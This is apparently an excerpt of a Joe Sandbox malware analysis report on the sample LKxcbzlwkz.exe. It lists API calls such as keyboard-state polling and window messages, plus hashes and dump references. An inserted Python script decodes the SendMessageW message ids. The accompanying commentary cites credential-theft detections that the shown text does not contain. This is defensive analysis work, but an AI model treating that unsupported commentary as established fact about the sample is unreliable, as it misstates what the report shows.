• Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
• Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
• Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(000000A1), ref: 004448C8
• GetKeyState.USER32(000000A1), ref: 004448D9
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
• Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
• Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
• Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
• Opcode ID: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
• Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
• Opcode Fuzzy Hash: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
• Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                                                                                                                                            • String ID: AU3_FreeVar
                                                                                                                                                                                                                                                            • API String ID: 2634073740-771828931
APIs
• CoInitialize.OLE32 ref: 0046C63A
• CoUninitialize.OLE32 ref: 0046C645
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
• CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
• CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
• CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
• IIDFromString.OLE32(?,?), ref: 0046C705
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 2294789929-1287834457
APIs
  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
• DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
• ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
• ImageList_EndDrag.COMCTL32 ref: 00471169
• ReleaseCapture.USER32 ref: 0047116F
• SetWindowTextW.USER32(?,00000000), ref: 00471206
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 2483343779-2107944366
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
• _wcslen.LIBCMT ref: 00450720
• _wcscat.LIBCMT ref: 00450733
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
Strings
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                                                                                                            • String ID: -----$SysListView32
                                                                                                                                                                                                                                                            • API String ID: 4008455318-3975388722
                                                                                                                                                                                                                                                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                                                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
• GetDlgCtrlID.USER32(00000000), ref: 00469C84
• GetParent.USER32 ref: 00469C98
• SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
• GetDlgCtrlID.USER32(00000000), ref: 00469CA5
• GetParent.USER32 ref: 00469CBC
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2360848162-1403004172
• Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
• Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
• Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
• Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
• String ID:
• API String ID: 262282135-0
• Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
• Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
• Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
• Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
• GetWindowLongW.USER32(?,000000F0), ref: 004481CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
• SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
• Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
• Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
• Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
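The function record above (call sites 004481A8 through 00448320) lists nothing but SendMessageW and GetWindowLongW calls with the window message given as a raw hexadecimal id, which tells an analyst little until the ids are resolved. The script below is an added example, not part of the Joe Sandbox report and not the sample's own code: it parses lines in the report's "APIs" format and resolves the Msg argument of SendMessageW against the public ListView (LVM_FIRST = 0x1000) and ListBox message constants from commctrl.h and winuser.h. The sample input is the record above copied verbatim; the constant table is an assumption in the sense that it only covers the ids that occur in this section, and the parsed lines with an unresolved "?" in the message position are reported as unknown rather than guessed. Running it shows every resolved message in this function is an LVM_* message, i.e. the function is a list-view control helper, not the credential-theft logic flagged elsewhere in the report.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: the "APIs" lines of the function record above, copied so
# the script runs offline without the report.
SAMPLE_API_LINES = """\
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
• GetWindowLongW.USER32(?,000000F0), ref: 004481CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
• SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
"""

# Subset of the public Win32 message ids (commctrl.h / winuser.h) needed for
# the ids that occur in this part of the report; extend as needed.
LVM_FIRST = 0x1000
MESSAGE_NAMES: Dict[int, str] = {
    0x0111: "WM_COMMAND",
    0x018C: "LB_SELECTSTRING",
    LVM_FIRST + 1: "LVM_SETBKCOLOR",
    LVM_FIRST + 4: "LVM_GETITEMCOUNT",
    LVM_FIRST + 8: "LVM_DELETEITEM",
    LVM_FIRST + 29: "LVM_GETCOLUMNWIDTH",
    LVM_FIRST + 30: "LVM_SETCOLUMNWIDTH",
    LVM_FIRST + 31: "LVM_GETHEADER",
    LVM_FIRST + 38: "LVM_SETTEXTBKCOLOR",
    LVM_FIRST + 77: "LVM_INSERTITEMW",
    LVM_FIRST + 87: "LVM_GETSTRINGWIDTHW",
    LVM_FIRST + 116: "LVM_SETITEMTEXTW",
}

# One report line: optional "Part of subcall function XXXX:" prefix, then
# Api.Module(args), then "ref: <call site>". Calls without a parameter list
# (e.g. "GetParent.USER32 ref: ...") are accepted with an empty argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*"
    r"(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the sandbox printed "?" (unresolved)
    ref: int                   # call-site address inside the dumped image
    parent: Optional[int]      # set for "Part of subcall function ..." lines


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    raw = (m.group("args") or "").strip()
    if raw:
        for a in raw.split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    parent = m.group("parent")
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(parent, 16) if parent else None)


def parse_api_lines(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def decode_messages(calls: List[ApiCall]) -> Dict[int, str]:
    """Map each Send/PostMessage call site to the symbolic name of its Msg argument."""
    out: Dict[int, str] = {}
    for c in calls:
        if c.api not in ("SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"):
            continue
        if len(c.args) < 2 or c.args[1] is None:
            out[c.ref] = "?"          # Msg not recovered by the sandbox; do not guess
            continue
        out[c.ref] = MESSAGE_NAMES.get(c.args[1], f"0x{c.args[1]:04X}")
    return out


def message_families(decoded: Dict[int, str]) -> Counter:
    """Count resolved messages by family prefix (LVM, LB, WM, ...); unknowns are skipped."""
    fam: Counter = Counter()
    for name in decoded.values():
        if "_" in name:
            fam[name.split("_", 1)[0]] += 1
    return fam


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    decoded = decode_messages(calls)
    for ref, name in sorted(decoded.items()):
        print(f"{ref:08X}  {name}")
    print(dict(message_families(decoded)))
```

The family tally is the triage signal: a function whose messages are all LVM_* is a GUI wrapper and can be deprioritised in favour of the records whose strings reference credential stores, which is where the detections listed at the top of the report come from.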
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
• Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
• Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
• Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
• Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 0-1603158881
• Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
• Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
• Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
• Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
APIs
• CreateMenu.USER32 ref: 00448603
• SetMenu.USER32(?,00000000), ref: 00448613
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
• IsMenu.USER32(?), ref: 004486AB
• CreatePopupMenu.USER32 ref: 004486B5
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
• DrawMenuBar.USER32 ref: 004486F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0
• API String ID: 161812096-4108050209
• Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
• Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
• Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
• Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
APIs
• GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\LKxcbzlwkz.exe), ref: 00434057
• LoadStringW.USER32(00000000), ref: 00434060
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
• LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 004340A1
                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                                                                                                                                            • C:\Users\user\Desktop\LKxcbzlwkz.exe, xrefs: 00434040
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\LKxcbzlwkz.exe
• API String ID: 3648134473-2680183623
• Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
• Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08b0a7904e5f174d8e424edd016ef1ca69a0848a79d97068c4559c38c9dcc648
• Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
• Opcode Fuzzy Hash: 08b0a7904e5f174d8e424edd016ef1ca69a0848a79d97068c4559c38c9dcc648
• Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545,C:\Users\user\Desktop\LKxcbzlwkz.exe,004A90E8,C:\Users\user\Desktop\LKxcbzlwkz.exe,?,0040F545), ref: 0041013C
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• lstrcmpiW.KERNEL32(?,?), ref: 00453900
• MoveFileW.KERNEL32(?,?), ref: 00453932
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: File$AttributesFullMoveNamePathlstrcmpi
• String ID:
• API String ID: 978794511-0
• Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
• Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
• Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
• Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
• Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
• Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
• Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
